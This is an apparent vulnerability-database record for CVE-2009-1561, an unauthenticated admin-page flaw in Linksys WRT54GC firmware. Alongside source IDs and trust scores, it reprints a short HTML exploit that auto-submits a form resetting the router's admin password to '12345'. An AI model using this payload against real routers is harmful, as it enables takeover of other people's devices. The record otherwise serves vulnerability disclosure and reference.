Details of VAR-E-200904-0438

ID

VAR-E-200904-0438

CVE

cve_id:

CVE-2009-1561

Trust: 1.6

sources: EXPLOIT-DB: 32931 // EDBNET: 54432

EDB ID

32931

TITLE

Linksys WRT54GC 1.5.7 Firmware - 'administration.cgi' Access Validation - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 32931

DESCRIPTION

Linksys WRT54GC 1.5.7 Firmware - 'administration.cgi' Access Validation. CVE-2009-1561CVE-54092 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 32931

AFFECTED PRODUCTS

vendor:

linksys

model:

wrt54gc

scope:

version:

1.5.7

Trust: 1.3

sources: BID: 34616 // EXPLOIT-DB: 32931

EXPLOIT

source: https://www.securityfocus.com/bid/34616/info

The Linksys WRT54GC router is prone to an access-validation vulnerability because of a lack of authentication when users access specific administration applications.

Successful attacks will lead to a compromise of the vulnerable device, which may lead to further attacks.

Linksys WRT54GC running firmware 1.05.7 is vulnerable; other versions may also be affected.

<html><body> <form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data"> <INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21> <INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21> </form>  <SCRIPT language="JavaScript"> document.senha.submit(); </SCRIPT>

Trust: 1.0

sources: EXPLOIT-DB: 32931

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 32931

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 32931

TYPE

'administration.cgi' Access Validation

Trust: 1.0

sources: EXPLOIT-DB: 32931

CREDITS

Gabriel Lima

Trust: 0.6

sources: EXPLOIT-DB: 32931

EXTERNAL IDS

db:	EXPLOIT-DB	id:	32931	Trust: 1.9
db:	BID	id:	34616	Trust: 1.9
db:	NVD	id:	CVE-2009-1561	Trust: 1.6
db:	EDBNET	id:	54432	Trust: 0.6

sources: BID: 34616 // EXPLOIT-DB: 32931 // EDBNET: 54432

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2009-1561	Trust: 1.6
url:	https://www.securityfocus.com/bid/34616/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/32931/	Trust: 0.6
url:	http://www.linksys.com/	Trust: 0.3
url:	https://www.exploit-db.com/exploits/32931	Trust: 0.3

sources: BID: 34616 // EXPLOIT-DB: 32931 // EDBNET: 54432

SOURCES

db:	BID	id:	34616
db:	EXPLOIT-DB	id:	32931
db:	EDBNET	id:	54432

LAST UPDATE DATE

2022-07-27T09:59:35.620000+00:00

SOURCES UPDATE DATE

db:

BID

id:

34616

date:

2009-04-21T22:36:00

SOURCES RELEASE DATE

db:	BID	id:	34616	date:	2009-04-20T00:00:00
db:	EXPLOIT-DB	id:	32931	date:	2009-04-20T00:00:00
db:	EDBNET	id:	54432	date:	2009-04-20T00:00:00